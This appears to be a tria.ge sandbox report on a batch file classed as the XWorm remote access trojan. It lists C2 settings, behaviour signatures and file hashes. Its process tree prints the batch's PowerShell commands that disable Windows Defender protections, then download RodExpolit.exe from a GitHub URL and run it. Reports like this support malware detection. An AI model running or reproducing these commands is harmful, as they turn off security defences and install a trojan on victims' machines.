Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://cdn.discorda...

windows10-ltsc 2021-x64

10

Analysis

  • max time kernel
    1800s
  • max time network
    1685s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    01/03/2025, 19:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://cdn.discordapp.com/attachments/1345482930600018010/1345484285460742255/exploit_2.bat?ex=67c4b763&is=67c365e3&hm=06eab45726494c005f7f778a126193c180656c8923b4b0b78d31113e74d0e4af&

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:32672

except-blessed.gl.at.ply.gg:32672
Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file 5 IoCs
  • Executes dropped EXE 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://cdn.discordapp.com/attachments/1345482930600018010/1345484285460742255/exploit_2.bat?ex=67c4b763&is=67c365e3&hm=06eab45726494c005f7f778a126193c180656c8923b4b0b78d31113e74d0e4af&
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:456
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe437c46f8,0x7ffe437c4708,0x7ffe437c4718
      2⤵
        PID:3772
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
        2⤵
          PID:4708
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:628
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
          2⤵
            PID:1028
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
            2⤵
              PID:2572
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
              2⤵
                PID:1104
              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:8
                2⤵
                  PID:1044
                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:8
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:920
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5744 /prefetch:8
                  2⤵
                    PID:4392
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:1
                    2⤵
                      PID:4312
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
                      2⤵
                        PID:816
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1
                        2⤵
                          PID:3460
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4648 /prefetch:1
                          2⤵
                            PID:4036
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
                            2⤵
                              PID:64
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 /prefetch:8
                              2⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4212
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "
                              2⤵
                                PID:400
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2864
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4244
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1488
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"
                                  3⤵
                                  • Blocklisted process makes network request
                                  • Command and Scripting Interpreter: PowerShell
                                  • Downloads MZ/PE file
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1752
                                • C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:1952
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "
                                2⤵
                                  PID:2864
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4516
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2140
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:848
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"
                                    3⤵
                                    • Blocklisted process makes network request
                                    • Command and Scripting Interpreter: PowerShell
                                    • Downloads MZ/PE file
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3556
                                  • C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe
                                    "C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"
                                    3⤵
                                    • Executes dropped EXE
                                    PID:3860
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "
                                  2⤵
                                    PID:4752
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                      3⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2748
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                      3⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:2432
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                      3⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:3792
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"
                                      3⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Downloads MZ/PE file
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4532
                                    • C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe
                                      "C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      PID:4528
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "
                                    2⤵
                                      PID:2136
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4388
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3628
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                        3⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1752
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"
                                        3⤵
                                        • Blocklisted process makes network request
                                        • Command and Scripting Interpreter: PowerShell
                                        • Downloads MZ/PE file
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:1820
                                      • C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe
                                        "C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        PID:3768
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\exploit (2).bat" "
                                      2⤵
                                        PID:4904
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:1636
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2160
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Set-MpPreference -DisableScriptScanning $true"
                                          3⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3764
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command "Invoke-WebRequest -Uri 'https://github.com/lukka1s/1/raw/refs/heads/main/RodExpolit.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe' -UseBasicParsing"
                                          3⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Downloads MZ/PE file
                                          PID:3628
                                        • C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe
                                          "C:\Users\Admin\AppData\Local\Temp\RodExpolit.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:4532
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,375054026877317946,15202798004081450131,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4520 /prefetch:2
                                        2⤵
                                          PID:4528
                                      • C:\Windows\System32\CompPkgSrv.exe
                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                        1⤵
                                          PID:2136
                                        • C:\Windows\System32\CompPkgSrv.exe
                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                          1⤵
                                            PID:1944

                                          Network

                                          MITRE ATT&CK Enterprise v15

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                            Filesize

                                            3KB

                                            MD5

                                            3eb3833f769dd890afc295b977eab4b4

                                            SHA1

                                            e857649b037939602c72ad003e5d3698695f436f

                                            SHA256

                                            c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

                                            SHA512

                                            c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                            Filesize

                                            152B

                                            MD5

                                            7fb0955b2f0e94f2388484f98deb88f4

                                            SHA1

                                            ab2363d95af3445a00981e78e6b6f0b860aade14

                                            SHA256

                                            a7c4cb739d577bfc41583a2dbf6e94ae41741c4529fe2d0443cd1dabefef8d15

                                            SHA512

                                            c9b6b6de78fb78c11b88860cd6c922d11717f5cf7477f602f197531aea114270c2b7111f66d96f60c3a9317fbf203fd26222e81d2d0eb70ad6515f5af1277edf

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                            Filesize

                                            111B

                                            MD5

                                            285252a2f6327d41eab203dc2f402c67

                                            SHA1

                                            acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                            SHA256

                                            5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                            SHA512

                                            11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
                                            Filesize

                                            186B

                                            MD5

                                            094ab275342c45551894b7940ae9ad0d

                                            SHA1

                                            2e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e

                                            SHA256

                                            ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3

                                            SHA512

                                            19d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                            Filesize

                                            5KB

                                            MD5

                                            826e229eed191b416df8cc3122551d7b

                                            SHA1

                                            f0b840ca98df7911ad4049df0e1882b3580f7810

                                            SHA256

                                            62c9aca87aa22e3c9214751c67df539877d1dc2ce2ca9325a283a6b135c75cb1

                                            SHA512

                                            f97b6a23aa758a920c9b413c78603f06b879a2bb22db74c133b6872db0661323af26e114b700fd9a40c02b9d8ac0d80a919dcd21eaa08eb9c7bd8b41aaf396d0

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                            Filesize

                                            5KB

                                            MD5

                                            491d64dd4b39898c804efcc61f9914f5

                                            SHA1

                                            81fa436ffa6117f5d77629a529697125bbe13b5c

                                            SHA256

                                            125217ba1ec5a67ba52977a379821a028697cc888e7f16be17bebabe9ad3ccc0

                                            SHA512

                                            41008cec8ad8e27705d42f6f5ae32ba8a99fb2d42e87db5c0c6a6b0adc7ae2ae75d2939b12c473c70f1c0cdf37ca6f40a8360d1714f18ecfa3908ea9150979fd

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
                                            Filesize

                                            24KB

                                            MD5

                                            2627e6345730a6a479da30c0883d24a5

                                            SHA1

                                            7442a41a25fcc5415e1609b647c6e414a32c7b99

                                            SHA256

                                            640a5e5b62d5e5ce53f120e2238d95d61f09b45d0d4035fcedc0f452c431b26d

                                            SHA512

                                            1cd1044e89ebd307c088b4ebe587d41dee3b6dfcb10fc4f70f95819fc9b1f98132b9715cf1bce76d5f15d97802e85776f2ae6bfb293c4d033e661e5d34354d28

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
                                            Filesize

                                            16B

                                            MD5

                                            6752a1d65b201c13b62ea44016eb221f

                                            SHA1

                                            58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                            SHA256

                                            0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                            SHA512

                                            9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                            Filesize

                                            10KB

                                            MD5

                                            caa8699f7a73adda0643f8c7054ef68a

                                            SHA1

                                            420acdd23e795a612dcbb5e8a9e7816b8901435f

                                            SHA256

                                            8d4842028222ff0835f8644eab2f677221d202f75f33e34c9223d4ed47075c8e

                                            SHA512

                                            6444b68f4a6608292c2819a4bebf98d04ff1219f8d0bdc3cb904bac0d1df875b19cc3e612dc8760c97c83e91ff44cfb58782b8976973d1c8794230ff1f245040

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Filesize

                                            1KB

                                            MD5

                                            c67441dfa09f61bca500bb43407c56b8

                                            SHA1

                                            5a56cf7cbeb48c109e2128c31b681fac3959157b

                                            SHA256

                                            63082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33

                                            SHA512

                                            325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Filesize

                                            1KB

                                            MD5

                                            dc93686e8636dadf6a7e1d302fe0234a

                                            SHA1

                                            a7d87ba655a42887d999bcfaf0201ce6a927548d

                                            SHA256

                                            a2f1cc23e8b0b92391bd912b0354e020e9c5a6959508628da5f153a6b1a7525f

                                            SHA512

                                            ceaf146afb2319351cd36f1c82138346548238ff57a01349e65b6db0ce5890e905c7da4aea45924b7ac4b13cf5be3272434cd5d6e6fb1e8f835ff8149dbc6692

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Filesize

                                            1KB

                                            MD5

                                            947eb59953486bd666dc8c88f5e62110

                                            SHA1

                                            02729dfe3d91d9210704f6cc43962dd3b4350305

                                            SHA256

                                            75e27fa2cf19f97b199b576c88ab3acb6e59d4c25855bd4b16148793234a668a

                                            SHA512

                                            8dcdac09a16f00cd98f7fe79d2db97a52a1a38f9d34ef12e279ebe12d93cede9f530fbf5b09c13f3362ed205b7592ab161b1811814c31cd95efc814fa52b656b

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Filesize

                                            1KB

                                            MD5

                                            9c18a46e713d90d76de14574766b65c9

                                            SHA1

                                            e8055bb325570e28cbb80bdd549a6799fd4381ab

                                            SHA256

                                            0c6bc17888c2c2e0a768175409fbf80edd73150e349fc1a63d3ef9eb092fccdd

                                            SHA512

                                            a142e580325fc2d7d11d003e75393b35d3bc8ec2f3087f24d639f226423212a0b368f0cdee1c1819b425463099f170bdf3db56bf67539ec3b1a9f2996261f547

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Filesize

                                            1KB

                                            MD5

                                            7de528a7f40ae22bad3bcd3b17fd6d5b

                                            SHA1

                                            cab09f93a5379aa8b7dae3a3c2b30ea4e7597c0b

                                            SHA256

                                            72f9da51c62dc38203c553f08bdddba874257c17cfa358a08818943e33d19fe3

                                            SHA512

                                            d5117d5d203fd0cef583c1d972ad071b7f10d6132601668777947453304f6ca60ae1ef6ffe4d481dbe78bceddd0351ad2f63f52a8d89d7731a12e048b7f9df18

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Filesize

                                            1KB

                                            MD5

                                            0ff797fd489c73082a9d60ebac486c5d

                                            SHA1

                                            6a9be08394ac21801475772d23daa64ba5e324f7

                                            SHA256

                                            60a60db50abcdf20566dd6c89645f8b8456575f4c0004173993a8d32df8ff735

                                            SHA512

                                            771db543ef53bb3efc9d9088af3c61c282f54876c8c9ab256a3fcc25eeb35a531aa94bc81d7d2e9251b3a7c3e78664cd83e04abc82b6cd57e660bc15650ec896

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Filesize

                                            1KB

                                            MD5

                                            f2fc04ba91ff00b2a5ab5626a3aa01ed

                                            SHA1

                                            116a2c2242174262a694358c88b1d930ecb0199a

                                            SHA256

                                            c14ac45f91937bccff3c68570ce41f9f27e3921d8872bccae686d639943d8d3a

                                            SHA512

                                            ea708ec8ab191793eb8e9da0be40cd07f3ff2f14e6c33ca6d7910f0a926b2ba1191ec5d261568240697657e6401a509ff12f4d68c92cd5f0684fb711cca18267

                                            Download Submit

                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            Filesize

                                            1KB

                                            MD5

                                            912ec3be37b862ade7729ce7f70059d0

                                            SHA1

                                            dae76bb26f90028133e9ee10f1369c04eeed097f

                                            SHA256

                                            599ddada93238c5e02811740f45efd05acb80841214b1abe6a4823a2408e079b

                                            SHA512

